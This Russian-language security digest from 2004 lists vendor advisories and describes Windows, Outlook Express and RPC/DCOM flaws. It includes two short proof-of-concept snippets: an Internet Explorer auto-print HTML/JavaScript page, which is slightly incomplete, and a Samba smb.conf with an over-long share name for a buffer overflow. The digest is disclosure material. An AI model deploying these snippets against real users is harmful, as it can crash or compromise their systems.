» Bugtraq по операционным системам

Уведомления

Gentoo LinuxGLSA200403-04 : Gentoo Linux : Multiple security vulnerabilities in Apache 2
Santa Cruz OperationCSSA-2004-013.0 : Santa Cruz Operation : mutt remote buffer overflow
CSSA-2004-014.0: Santa Cruz Operation : mc Updated packages resolve local buffer

Уведомления

Cisco2004-27-03: Exploit for Multiple Previous Cisco Vulnerabilities Released
DebianDSA 468-1: emil
DSA 467-1: ecartis
FreeBSDFreeBSD-SA-04:06.ipv6 : setsockopt(2) IPv6 sockets input validation error
Gentoo LinuxGLSA 200403-08 : Gentoo Linux : oftpd DoS vulnerability
GLSA 200403-06: Gentoo Linux : Multiple remote buffer overflow vulnerabilities in Courier
GLSA 200403-07 : Gentoo Linux : Multiple remote overflows and vulnerabilities in Ethereal
200403-05: Gentoo Linux : UUDeview MIME Buffer Overflow
Mod_Survey2004-03-21, Script injection
Red HatRHSA-2004:134-01: RedHat : Updated squid package fixes security vulnerability
SOT LinuxSLSA-2004:10: Updated sysstat package for SOT Linux 2003
SLSA-2004:9: Updated mozilla package for SOT Linux 2003
SLSA-2004:8: Updated apache-ssl package for SOT Linux 2003
Silicon Graphics20040304-01-U : Silicon Graphics обновил SGI Advanced Linux Environment

Уведомления

HEWLETT-PACKARDSSRT3614 : HP OpenCall Multiservice Controller (OCMC) DoS (Denial of Service)
SSRT4700: HP Web Jetadmin denial of service
TrustixTSLSA-2004-0015: Trustix обновил tcpdump
TSLSA-2004-0017: Trustix обновил apache

Уведомления

Conectiva LinuxCLA-2004:833 : Conectiva Security Announcement - mc
CLA-2004:836 : Conectiva Security Announcement - libxml2
DebianDSA 470-1 ebian обновил ядро
DSA 471-1 : Debian обновил interchange
DSA 472-1 : Debian обновил fte
DSA 460-2 : Debian обновил sysstat
DSA 473-1: Debian обновил oftpd
DSA 474-1 : Debian обновил squid
Gentoo LinuxGLSA 200403-10: Gentoo Linux : Fetchmail 6.2.5 fixes a remote DoS
GLSA 200403-11 : Gentoo Linux : Squid ACL [url_regex] bypass vulnerability
GLSA 200403-09 : Gentoo Linux : Buffer overflow in Midnight Commander
GLSA 200403-12 :Gentoo Linux : OpenLDAP DoS Vulnerability
GLSA 200403-13 : Gentoo Linux : Remote buffer overflow in MPlayer
GLSA 200403-14 : Gentoo Linux : Multiple Security Vulnerabilities in Monit
Mandrake LinuxMDKSA-2004:024 : Mandrake обновил ethereal
OpenPKGOpenPKG-SA-2004.008 : OpenPKG обновил squid
Red HatRHSA-2004:137-01: RedHat : Updated Ethereal packages fix security issues
Santa Cruz OperationSCOSA-2004.1 : UnixWare 7.1.3 Open UNIX 8.0.0 UnixWare 7.1.1 : perl unsafe Safe
Silicon Graphics20040401-01-P : Silicon Graphics : IRIX ftpd ftp_syslog issue with anonymous FTP
20030601-01-I: Silicon Graphics : Some Network Drivers May Leak Data

Уведомления

CiscoExploit for Multiple Cisco Vulnerabilities Released
Conectiva LinuxCLA-2004:836: libxml2
CLA-2004:835: ethereal
CLA-2004:834: openssl
CLA-2004:833: mc
DebianDSA 470-1: New Linux 2.4.17 packages fix several local root exploits (hppa)
DSA 469-1: pam-pgsql
FreeBSDFreeBSD-SA-04:06.ipv6: setsockopt(2) IPv6 sockets input validation error
Gentoo LinuxGLSA 200403-14: Multiple Security Vulnerabilities in Monit
GLSA 200403-13: Remote buffer overflow in MPlayer
GLSA 200403-12: OpenLDAP DoS Vulnerability
GLSA 200403-09: Buffer overflow in Midnight Commander
GLSA 200403-11: Squid ACL [url_regex] bypass vulnerability
GLSA 200403-10: Fetchmail 6.2.5 fixes a remote DoS
GLSA 200403-08: oftpd DoS vulnerability
GLSA 200403-07: Multiple remote overflows and vulnerabilities in Ethereal
GLSA 200403-06: Multiple remote buffer overflow vulnerabilities in Courier
200403-05: UUDeview MIME Buffer Overflow
GLSA 200403-04: Apache 2
MPlayer #002Remotely exploitable vulnerability in HTTP parser
MandrakelinuxMDKSA-2004:025: squid
MDKSA-2004:024: ethereal
Netwosix Linux2004-0007: ethereal
#2004-0007: ethereal
OpenPKGOpenPKG-SA-2004.008: squid
Red HatRHSA-2004:137-01: Updated Ethereal packages fix security issues
SCOCSSA-2004-014.0: OpenLinux: mc Updated packages resolve local buffer overflow vulnerability
CSSA-2004-013.0: OpenLinux: mutt remote buffer overflow
SGI20040303-01-U: SGI Advanced Linux Environment security update #15
Trustix Secure Linux2004-0017: apache
2004-0015: tcpdump, libpcap
Turbolinux30/Mar/2004: wu-ftpd, openssl

Уведомления

DebianDSA 475-1 : Debian обновил kernel-image-2.4.17-hppa
OpenPKGOpenPKG-SA-2004.009 : OpenPKG обновил mc

Уведомления

AppleAPPLE-SA-2004-04-05: Apple обновил Mac OS X
DebianDSA 476-1: Debian обновил heimdal
DSA 477-1: Debian обновил xine-ui
DSA 478-1 : Debian обновил tcpdump
Gentoo LinuxGLSA 200404-02 : KDE Personal Information Management Suite Remote Buffer Overflow Vulnerability
GLSA 200404-04: Gentoo Linux : Multiple vulnerabilities in sysstat
GLSA 200404-05: Gentoo Linux : ipsec-tools contains an X.509 certificates vulnerability.
GLSA 200404-06: Gentoo Linux : Util-linux login may leak sensitive data
HEWLETT-PACKARDHPSBMA01010 : SSRT4727 rev.0 OpenView Operations remote unauthorized access
HPSBGN01009 : SSRT4726 rev.0 Carrier Grade Invalid LAN Management Configuration
HPSBUX0101-137 : Hewlett-Packard : rev.3 Support Tools Manager Denial of Service
Mandrake LinuxMDKSA-2004:026 : Mandrake обновил mplayer
OpenPKGOpenPKG-SA-2004.010: OpenPKG обновил tcpdump
OpenPKG-SA-2004.011: OpenPKG обновил sharutils

Уведомления

Cisco Cisco Security Advisory: Cisco IPSec VPN Services Module Malformed IKE Packet
Gentoo LinuxGLSA 200404-09 : Cross-realm trust уязвимость в Heimdal
GLSA 200404-10 : iproute local Denial of Service vulnerability
GLSA 200404-11 : Множественные уязвимости в pwlib
GLSA 200404-12 : Scorched 3D server chat box format string vulnerability
GLSA-200404-12 : Scorched 3D server chat box format string vulnerability

Уведомления

099AVulnerability in Internet Explorer ITS Protocol Handler
Apple Security Update2004-04-05: APPLE-SA-2004-04-05
CiscoCisco IPSec VPN Services Module Malformed IKE Packet Vulnerability
A Default Username and Password in WLSE and HSE
Conectiva LinuxCLA-2004:837 : Conectiva Linux обновил mod_python
CLA-2004:838: Conectiva Linux обновил squid
DebianDSA 478-1: New tcpdump packages fix denial of service
DSA 477-1: New xine-ui packages fix insecure temporary file creation
DSA 476-1: New heimdal packages fix cross-realm vulnerability
DSA 475-1: New Linux 2.4.18 packages fix several local root exploits (hppa)
DSA 474-1: New squid packages fix ACL bypass
DSA 473-1: New oftpd packages fix denial of service
DSA 460-2: New sysstat packages fix insecure temporary file creation
DSA 472-1: New fte packages fix buffer overflows
DSA 471-1: New interchange packages fix information leak
Gentoo LinuxGLSA 200404-08: GNU Automake symbolic link vulnerability
GLSA 200404-07: ClamAV RAR Archive Remote Denial Of Service Vulnerability
GLSA 200404-06: Util-linux login may leak sensitive data
GLSA 200404-04: Multiple vulnerabilities in sysstat
GLSA 200404-03: Tcpdump Vulnerabilities in ISAKMP Parsing
GLSA 200404-02: KDE Personal Information Management Suite Remote Buffer Overflow Vulnerability
GLSA 200404-01: Insecure sandbox temporary lockfile vulnerabilities in Portage
Macromedia Security BulletinMPSB 04-05: Potential Risk in Dreamweaver Remote Database Connectivity
MandrakelinuxMDKSA-2004:026: mplayer
Netwosix Linux2004-0010: leak problem in util-linux
2004-0009: Automake symbolic link vulnerability
#2004-0008: monit
OpenPKGOpenPKG-SA-2004.012: fetchmail
OpenPKG-SA-2004.011: sharutils
OpenPKG-SA-2004.010: tcpdump
OpenPKG-SA-2004.009: mc
SGI20040402-01-U: SGI Advanced Linux Environment security update #17
20030601-01-I: Some Network Drivers May Leak Data
20040401-01-P: IRIX ftpd ftp_syslog issue with anonymous FTP
SOT LinuxSLSA-2004:15: Updated tcpdump package for SOT Linux 2003
SLSA-2004:14: Updated sharutils package for SOT Linux 2003
SLSA-2004:13: Updated squid package for SOT Linux 2003
SLSA-2004:12: Updated grep package for SOT Linux 2003
SLSA-2004:11: Updated ethereal package for SOT Linux 2003
Turbolinux07/Apr/2004: apache, httpd, libxml2, mod_python

Уведомления

HEWLETT-PACKARDSSRT3674 : Tru64 UNIX IPsec/IKE Potential Remote Unauthorized Access
MicrosoftMS04-012: Cumulative Update for Microsoft RPC/DCOM (828741)
MS04-013: Cumulative Security Update for Outlook Express (837009)
MS04-011: Security Update for Microsoft Windows (835732)

Уязвимости

14 новых уязвимостей в Microsoft Windows NT 4.0/2000/XP/2003
Microsoft опубликовала исправление, которое устраняет 14 недавно обнаруженных уязвимостей в Windows NT 4.0/2000/XP/2003. Удаленный атакующий может получить полный контроль над системой, включая установку программ, просмотр, чтение или удаление данных или создание новых учетных записей.

1. LSASS Vulnerability - CAN-2003-0533: Удаленное переполнение буфера обнаружено в LSASS. Удаленный атакующий может эксплуатировать эту уязвимост, чтобы получить полный контроль над уязвимой системой.

2. LDAP Vulnerability - CAN-2003-0663: Удаленный атакующий может послать специально обработанное LDAP сообщение к контроллеру домена, чтобы заставить сервер прекратить обслуживать аутентифицированных пользователей в Active Directory домене.

3. PCT Vulnerability - CAN-2003-0719: Переполнение буфера обнаружено в Private Communications Transport (PCT) протоколе, который является частью Microsoft Secure Sockets Layer (SSL) библиотеки. Уязвимы только системы, использующие SSL протокол, и в некоторых случаях Windows 2000 контроллер домена. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

4. Winlogon Vulnerability - CAN-2003-0806: Переполнение буфера обнаружено в Windows logon process (Winlogon). Процесс не проверяет размер значений, используемых в процессе входа в систему. В результате удаленный атакующий может выполнить произвольный код на уязвимой системе. Уязвимы только системы, которые являются членами домена. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

5. Metafile Vulnerability - CAN-2003-0906: Переполнение буфера обнаружено в обработке Windows Metafile (WMF) и Enhanced Metafile (EMF) форматов изображений, позволяя удаленному атакующему выполнить произвольный код на уязвимой системе. Уязвимы любые программы, обрабатывающие WMF или EMF изображения. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

6. Help and Support Center Vulnerability - CAN-2003-0907: Уязвимость удаленного выполнения произвольного кода обнаружена в Help and Support Center в пути, которым система обрабатывает HCP URL. Атакующий может сконструировать специально обработанный HCP URL, который выполнить произвольный код на системе пользователя, просматривающего злонамеренную Web страницу или HTML email сообщение. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

7. Utility Manager Vulnerability - CAN-2003-0908: Уязвимость поднятия привилегий обнаружена в пути, которым Utility Manager запускает приложения. Зарегистрированный пользователь может заставить Utility Manager запустить приложение с SYSTEM привилегиями, чтобы получить полный контроль над уязвимой системой.

8. Windows Management Vulnerability - CAN-2003-0909: Уязвимость поднятия привилегий обнаружена в пути, которым Windows XP позволяет создавать задачи. При некоторых условиях, непривилегированный пользователь может создать задачу, которые будет выполнена с системными привилегиями, чтобы получить полный контроль над уязвимой системой.

9. Local Descriptor Table Vulnerability - CAN-2003-0910: Уязвимость поднятия привилегий обнаружена в программном интерфейсе, который используется для создания записей в Local Descriptor Table (LDT). Эти записи содержат информацию об сегментах памяти. Атакующий, зарегистрированный в системе локально, может создать специально обработанную запись чтобы получить доступ к защищенной памяти, чтобы получить полный контроль над системой.

10. H.323 Vulnerability - CAN-2004-0117: Уязвимость удаленного выполнения произвольного кода обнаружена в пути, которым Microsoft H.323 протокол обрабатывает некорректные запросы. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

11. Virtual DOS Machine Vulnerability - CAN-2004-0118: Уязвимость поднятия привилегий обнаружена в компоненте операционной системы, которая обрабатывает Virtual DOS Machine (VDM) подсистему. Уязвимость позволяет локальному пользователю получить полный контроль над уязвимой системой.

12. Negotiate SSP Vulnerability - CAN-2004-0119 Переполнение буфера обнаружена в Negotiate Security Software Provider (SSP) интерфейсе. Уязвимость обнаружена в пути, которым Negotiate SSP интерфейс обрабатывает значение, используемое в процессе аутентификации. Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой.

13. SSL Vulnerability - CAN-2004-0120: Отказ в обслуживании обнаружен в Microsoft Secure Sockets Layer (SSL) библиотеке. Удаленный атакующий может создать специально обработанное SSL сообщение, которое заставить уязвимую систему прекратить обслуживать SSL подключения на Windows 2000 и Windows XP. На Windows Server 2003, система автоматически будет перезагружена.

14.ASN.1 “Double Free” Vulnerability - CAN-2004-0123: Уязвимость, позволяющая удаленно выполнить произвольный код, обнаружена в Microsoft ASN.1 библиотеке. Уязвимость связана с возможностью двойного освобождения памяти в Microsoft ASN.1 Library. . Атакующий, который успешно эксплуатирует эту уязвимость, может получить полный контроль над уязвимой системой. Однако, большинство сценариев нападения приведут к отказу в обслуживании.

Удаленное выполнение произвольного кода в Outlook Express 5.5 и 6.0 Microsoft выпустила исправление, которое устраняет недавно обнаруженную уязвимость в Outlook Express 5.5 и 6.0. Удаленный атакующий может получить полный контроль над уязвимой системой, даже если Outlook Express не используется как почтовый клиент по умолчанию.

MHTML URL Processing Vulnerability - CAN-2004-0380: Уязвимость удаленного выполнения произвольного кода обнаружена в обработке специально сформированного MHTML URL. Удаленный атакующий может выполнить произвольный HTML код в зоне безопасности Local Machine в Internet Explorer. В результате удаленный атакующий может получить полный контроль над уязвимой системой.
Четыре новых уязвимостей в RPC/DCOM в Microsoft WIndows 4.0/2000/XP/2003 Мicrosoft опубликовал исправление, которое устраняет несколько недавно обнаруженных уязвимостей в RPC/DCOM. Удаленный атакующий может получить полный контроль над системой, включая установку программ, просмотр, чтение или удаление данных или создание новых учетных записей.

1. RPC Runtime Library Vulnerability, CAN-2003-0813 – уязвимость состояния операции обнаружена в Windows RPC DCOM (эксплоит был впервые опубликован на форуме SecurityLab в октябре 2003 года). Удаленный атакующий может вызвать отказ в обслуживании (аварийное завершение работы системы или перезагрузка), создавая два потока для одного и того же RPC запроса. Как сообщает Microsoft, уязвимость может использоваться для выполнения произвольного кода на уязвимой системе. Microsoft оценила риск этой уязвимости как “критическая”.

2. RPCSS Service Vulnerability, CAN-2004-0116 – Удаленный атакующий может послать специально обработанный запрос к RPCSS службе, чтобы вызвать условия отказа в обслуживании. Microsoft оценила риск этой уязвимости как “Важная”.

3. COM Internet Services (CIS) – RPC over HTTP Vulnerability - CAN-2003-0807. Отказ в обслуживании обнаружен в CIS и в RPC over HTTP Proxy компонентах. Когда перенаправляется запрос к внутреннему интерфейсу системы, нападающий может ответить на запрос, используя специально обработанное сообщение, которое может заставить уязвимые компоненты перестать обрабатывать последующие запросы. Microsoft оценила риск этой уязвимости как “Низкая”.

4. Object Identity Vulnerability - CAN-2004-0124 – уязвимость раскрытия информации обнаружена в пути, которым создается тождественный объект. Эта уязвимость позволяет атакующему разрешить приложениям открыть сетевые коммуникационные порты. Хотя уязвимость не позволяет атакующему напрямую скомпрометировать систему, однако она может использоваться для открытия сетевых подключений через “неожиданные” коммуникационные порты. Microsoft оценила риск этой уязвимости как “Низкая”. [/url]

Уведомления

DebianDSA 484-1 : Debian обновил xonix
DSA 485-1 : Debian обновил ssmtp
DSA 479-1: Debian обновил ядро (2.4.18) - несколько уязвимостей
DSA 483-1 : Debian обновил mysql
DSA 482-1 : Debian обновил ядро (2.4.17) - несколько уязвимостей
DSA 479-2 : Debian обновил kernel-image-2.4.18-1-i386
Mandrake LinuxMDKSA-2004:029 : Mandrake обновил ядро
MDKSA-2004:028: Mandrake обновил cvs
OpenPKGOpenPKG-SA-2004.013 : OpenPKG обновил cvs
OpenPKG-SA-2004.014 : OpenPKG обновил mysql
Red HatRHSA-2004:158-01 : RedHat : Updated cadaver package fixes security vulnerability in neon
RHSA-2004:154-01 : RedHat : Updated CVS packages fix security issue
SuSESuSE-SA:2004:008: SuSE обновил cvs
SuSE-SA:2004:009 : SuSE обновил ядро

Уязвимости

Автоматическая распечатка Web страницы в Microsoft Internet Explorer
Программа: Microsoft Internet Explorer 6.0
Опасность: Низкая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTMl, который, когда будет загружен целевым пользователем, автоматически пошлет задание на принтер целевого пользователя.
Пример/Эксплоит:

Код: <HTML>
<HEAD>
<SCRIPT language="JavaScript">
function ieExecWB( intOLEcmd, intOLEparam )
{ // Create OLE Object
var WebBrowser = '<OBJECT ID="WebBrowser1" WIDTH=0 HEIGHT=0
CLASSID="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2"></OBJECT>';
// Place Object on page
document.body.insertAdjacentHTML('beforeEnd', WebBrowser);
// if intOLEparam is not defined, set it
if ( ( ! intOLEparam ) || ( intOLEparam < -1 ) || (
intOLEparam > 1) )
intOLEparam = 1;
// Execute Object
WebBrowser1.ExecWB( intOLEcmd, intOLEparam );
// Destroy Object
WebBrowser1.outerHTML = "";
function printAll()
{
// Uncomment this to enable the exploit!
//ieExecWB(6,-1);
</SCRIPT>
</HEAD>
<BODY onload="printAll()">
<h3>I like your PRINTER</h3>
</BODY>
</HTML>

Уведомления

FreeBSDFreeBSD-SA-04:07.cvs : FreeBSD : CVS path validation errors
Mandrake LinuxMDKSA-2004:030 : Mandrake обновил tcpdump
Red HatRHSA-2004:159-01 : RedHat : Updated Subversion packages fix security vulnerability in neon

Уведомления

DebianDSA 486-1 : Debian обновил cvs
DSA 487-1:Debian обновил neon
DSA 431-2 ebian обновил perl
DSA 488-1 : Debian обновил logcheck
DSA 489-1 : Debian обновил kernel-source-2.4.17 kernel-patch-2.4.17-mips
DSA 490-1 : Debian обновил zope
DSA 491-1 : Debian обновил kernel-source-2.4.19 kernel-patch-2.4.19-mips
DSA 492-1: Debian обновил iproute
OpenPKGOpenPKG-SA-2004.015: OpenPKG обновил ethereal
OpenPKG-SA-2004.016 : OpenPKG обновил neon, subversion, cadaver, sitecopy, tla
Slackware LinuxSSA:2004-108-01 :Slackware Linux : tcpdump denial of service
TrustixTSL-2004-0019: Trustix обновил squid

Уведомления

104AMultiple Vulnerabilities in Microsoft Products
Cisco Security NoticeCisco IPsec VPN Implementation Group Password Usage Vulnerability
Revision 2.0: Dictionary Attack on Cisco LEAP Vulnerability
Conectiva LinuxCLA-2004:839: apache
Conectiva Linux Security Announcement: squid
CLA-2004:837: mod_python
DebianDSA 485-1: New ssmtp packages fix format string vulnerabilities
DSA 484-1: New xonix packages fix failure to drop privileges
DSA 479-2: New Linux 2.4.18 packages fix local root exploit (i386)
DSA 483-1: New mysql packages fix insecure temporary file creation
DSA 482-1: New Linux 2.4.17 packages fix local root exploit (source+powerpc/apus+s390)
DSA 481-1: New Linux 2.4.17 packages fix local root exploit (ia64)
DSA 480-1: New Linux 2.4.17 and 2.4.18 packages fix local root exploit (hppa)
DSA 479-1: New Linux 2.4.18 packages fix local root exploit (source+alpha+i386+powerpc)
FreeBSDFreeBSD-SA-04:07.cvs: CVS path validation errors
Gentoo LinuxGLSA 200404-13: CVS Server and Client Vulnerabilities
GLSA 200404-12: Scorched 3D server chat box format string vulnerability
GLSA 200404-10: iproute local Denial of Service vulnerability
GLSA 200404-09: Cross-realm trust vulnerability in Heimdal
MandrakelinuxMDKSA-2004:030: tcpdump
MDKSA-2004:029: kernel
MDKSA-2004:029: kernel
MDKSA-2004:028: cvs
MicrosoftWindows Security Bulletin Summary for April 2004
Security Bulletin Re-releases (April 2004)
OpenPKGOpenPKG-SA-2004.016: neon
OpenPKG-SA-2004.015: ethereal
OpenPKG-SA-2004.014: mysql
OpenPKG-SA-2004.013: cvs
Red HatRHSA-2004:159-01: Updated Subversion packages fix security vulnerability in neon
RHSA-2004:154-01: Updated CVS packages fix security issue
RHSA-2004:158-01: Updated cadaver package fixes security vulnerability in neon
RHSA-2004:154-01: Updated CVS packages fix security issue
SOT LinuxSLSA-2004:16: Updated mc package for SOT Linux 2003
SUSESuSE-SA:2004:008: cvs
SuSE-SA:2004:009: Linux Kernel
Trustix Secure Linux2004-0020: kernel

Уведомления

Gentoo LinuxGLSA 200404-16 : Gentoo Linux : Множественные уязвимости в monit
GLSA 200404-15: Gentoo Linux : XChat 2.0.x SOCKS5 Vulnerability
GLSA 200404-14 : Gentoo Linux : Множественные уязвимости в cadaver
Mandrake LinuxMDKSA-2004:031 : Mandrake обновил utempter
Slackware LinuxSSA:2004-110-01 : Slackware Linux обновил utempter

Уведомления

CiscoUS-CERT Technical Cyber Security Alert TA04-111A -- Vulnerabilities in TCP
cisco-sa-20040420-tcp-nonios : Cisco Security Advisory: TCP Vulnerabilities in Multiple Non-IOS Cisco Products
cisco-sa-20040420-tcp-ios : Cisco Security Advisory: TCP Vulnerabilities in Multiple IOS-Based Cisco Products
cisco-sa-20040420: Cisco обновил SNMP
Mandrake LinuxMDKSA-2004:035 : Mandrake обновил samba
MDKSA-2004:032: Mandrake обновил libneon
MDKSA-2004:033: Mandrake обновил xine-ui
MDKSA-2004:034: Mandrake обновил MySQL

Уведомления

NetBSD2004-006 : NetBSD : TCP protocol and implementation vulnerability
2004-005 : NetBSD : Denial of service vulnerabilities in OpenSSL
OpenPKGOpenPKG-SA-2004.015 : OpenPKG обновил ethereal
Red HatRHSA-2004:166-01 : RedHat : Updated kernel packages resolve security vulnerabilities
FEDORA-2004-108 :FEDORA обновил utempter
Silicon Graphics20040403-01-A : Silicon Graphics : Vulnerabilities in long-lived TCP connections

Уведомления

DebianDSA 494-1 : Debian обновил ident2
Mandrake LinuxMDKSA-2004:036: Mandrake обновил xchat
Silicon Graphics20040404-01-U : Silicon Graphics обновил SGI Advanced Linux Environment
Slackware LinuxSSA:2004-111-01: Slackware Linux обновил xine

Уведомления

CERT Technical Cyber Security AlertTA04-111A: Vulnerabilities in TCP
CERT Technical Cyber SecurityAlert TA04-111B: Cisco IOS SNMP Message Handling Vulnerability
CiscoVulnerabilities in SNMP Message Processing
TCP Vulnerabilities in Multiple IOS Based Cisco Products
TCP Vulnerabilities in Multiple Non-IOS Cisco
DebianDSA 494-1: New ident2 packages fix buffer overflow
DSA 493-1: New xchat packages fix arbitrary code execution
DSA 492-1: New iproute packages fix denial of service
DSA 491-1: New Linux 2.4.19 packages fix local root exploit (mips)
DSA 490-1: New Zope packages fix arbitrary code execution
DSA 489-1: New Linux 2.4.17 packages fix local root exploit (mips+mipsel)
DSA 488-1: New logcheck packages fix insecure temporary directory
DSA 431-2: New perl packages fix information leak in suidperl
DSA 487-1: New neon packages fix format string vulnerabilities
DSA 486-1: cvs
DSA 493-1: Debian обновил xchat
DSA 495-1 : Debian обновил ядро
Gentoo LinuxGLSA 200404-14: Multiple format string vulnerabilities in cadaver
GLSA 200404-15: XChat 2.0.x SOCKS5 Vulnerability
GLSA 200404-16: Multiple new security vulnerabilities in monit
GLSA 200404-17 : Gentoo Linux обновил racoon
GLSA 200404-17: ipsec-tools and iputils contain a remote DoS vulnerability
GLSA 200404-18: Gentoo Linux : множественные уязвимости в ssmtp
HEWLETT-PACKARDHPSBUX01022 : Hewlett-Packard : Remote denial of service in Apache HTTP Server - Rev 0.
HPSBUX01019: Hewlett-Packard : SSRT4717 rev.0 Remote denial of service in Apache OpenSSL SSL/TLS
MandrakelinuxMDKSA-2004:031-1: utemper
MDKSA-2004:036: xchat
-samba (MDKSA-2004:035)
MDKSA-2004:034: MySQL
MDKSA-2004:033: xine-ui
MDKSA-2004:032: libneon
MDKSA-2004:031: Updated utempter packages fix several vulnerabilities
NISCC Vulnerability Advisory236929: Vulnerability Issues in TCP
NetBSD2004-006: TCP protocol and implementation vulnerability
2004-005: Denial of service vulnerabilities in OpenSSL
Netwosix Linux2004-0011: CVS Server and Client Vulnerabilities
2004-0012: Multiple format string vulnerabilities in neon
PostNukePNSA 2004-2: SQL injection in Comments and Your_Account modules
Red HatRHSA-2004:166-01: Updated kernel packages resolve security vulnerabilities
FEDORA-2004-111: FEDORA обновил ядро
SGI20040403-01-A: Vulnerabilities in long-lived TCP connections
SOT LinuxSLSA-2004:17: Updated cvs package for SOT Linux 2003
SUN Microsysytem Sun Alert ID: 57470: Security Vulnerability With the Extended Library Function sendfilev(3EXT)
SlackwareSSA:2004-111-01: xine security update
SSA:2004-110-01: utempter security update
SSA:2004-108-02: cvs security update
SSA:2004-108-01: tcpdump denial of service
Trustix Secure Linux2004-0022: kernel

Переполнение буфера в Microsoft Internet Explorer и Microsoft Windows Explorer в обработке имен сетевых ресурсов

Программа: Microsoft Internet Explorer, Microsoft Windows Explorer
Опасность: Критическая
Наличие эксплоита: Да
Описание: Уязвимость обнаружена в Microsoft Windows Explorer и в Microsoft Internet Explorer. Удаленный пользователь, контролирующий общедоступный сетевой ресурс (network share), может аварийно завершить работу или выполнить произвольный код на системе целевого пользователя, подключившегося к сетевому ресурсу.

Удаленный пользователь, контролирующий SMB шару, может установить специально обработанное значение имени шары, чтобы, когда целевой пользователь попытается подключиться к SMB шаре, аварийно завершить работу Microsoft Windows Explorer или Microsoft Internet Explorer или выполнить произвольный код. <> Согласно сообщению, Microsoft устранил эту уязвимость в Windows XP SP1 и Windows 2000 SP4 в начале 2002 года, как описано в Microsoft KB article 322857:

http://support.microsoft.com/default.aspx?scid=kb;en-us;322857

Однако уязвимость до сих пор не устранена.

Пример/Эксплоит: Windows не позволяет создавать длинные шары, однако ее можно создать через samba. Пример smb.conf:

#------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment =3D Area 51
path =3D /tmp/testfolder
public =3D yes
writable =3D yes
printable =3D no
browseable =3D yes
write list =3D @trymywingchung
#------------ CUT HERE -------------

URL производителя: http://www.microsoft.com/technet/security/
Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время.

Уведомления

Engarde Secure LinuxESA-20040428-004 : EnGarde обновил ядро
Silicon Graphics20040406-01-U : SGI Advanced Linux Environment security update #19

Уведомления

Conectiva LinuxCLA-2004:840 : Conectiva Linux обновил lha
HEWLETT-PACKARDHPSBMA01037-SSRT4717 rev.0 : Hewlett-Packard : remote DoS with OpenSSL SSL/TLS in HP WBEM Services
OpenPKGOpenPKG-SA-2004.020 : OpenPKG обновил ssmtp
SuSESuSE-SA:2004:011: SuSE обновил XLive CD 9.1

Уведомления

Conectiva LinuxCLA-2004:840 : Conectiva Linux обновил lha
Gentoo LinuxGLSA 200405-01: Multiple format string vulnerabilities in neon 0.24.4 and earlier
GLSA 200405-02: Multiple vulnerabilities in LHa
GLSA 200405-02: Gentoo Linux обновил LHa
GLSA 200405-01 : Gentoo Linux : Multiple format string vulnerabilities in neon 0.24.4 and earlier
HEWLETT-PACKARDHPSBMA01037-SSRT4717 rev.0 : Hewlett-Packard : remote DoS with OpenSSL SSL/TLS in HP WBEM Services
OpenPKGOpenPKG-SA-2004.020 : OpenPKG обновил ssmtp
SuSESuSE-SA:2004:011: SuSE обновил XLive CD 9.1

Уведомления

DebianDSA 502-1: Debian обновил exim-tls
Gentoo LinuxGLSA 200405-03 : Gentoo Linux : ClamAV VirusEvent parameter vulnerability
GLSA 200405-04: Gentoo Linux : OpenOffice.org vulnerability when using DAV servers
Mandrake LinuxMDKSA-2004:042: Mandrake : Updated rsync packages fixes potential to write outside of directory tree.
MDKSA-2004:043 : Mandrake обновил apache2

Уведомления

Mandrake LinuxMDKSA-2004:046: Mandrake обновил apache
MDKSA-2004:044 : Mandrake : Updated libuser packages fix vulnerability
MDKSA-2004:045: Mandrake : Updated passwd packages fix vulnerabilities
MDKSA-2004:045: Mandrake обновил passwd
Slackware LinuxSSA:2004-136-01 : Slackware Linux обновил mc

Уведомления

Gentoo LinuxGLSA 200405-08: Gentoo Linux : Pound format string vulnerability
Mandrake LinuxMDKSA-2004:047 : Mandrake обновил kdelibs
Silicon Graphics20040503-01-P: Silicon Graphics обновил rpc.mountd
Slackware LinuxSSA:2004-238-01: Slackware Linux обновил kdelibs
Debian GNU/Linux
DSA 504-1 : Debian : New heimdal packages fix potential buffer overflow

Уведомления

Gentoo LinuxGLSA 200405-11: KDE
GLSA 200405-12: CVS heap overflow vulnerability
GLSA 200405-13: neon heap-based buffer overflow
GLSA 200405-14: Buffer overflow in Subversion
Mandrake LinuxMDKSA-2004:046-1: apache-mod_perl
Red HatFEDORA-2004-131: cvs
FEDORA-2004-126: cvs
FEDORA-2004-132: ipsec-tools
Silicon Graphics20040505-01-U: Kernel
20040504-01-U: Kernel
Slackware LinuxSSA:2004-140-01: cvs

Уведомления

Conectiva LinuxCLA-2004:841 :Conectiva Linux обновил libneon
CLA-2004:842 : Conectiva Linux обновил mailman
DebianDSA 508-1: Debian обновил xpcd
Gentoo LinuxGLSA 200405-17: Multiple vulnerabilities in metamail
GLSA 200405-18 : Buffer Overflow in Firebird
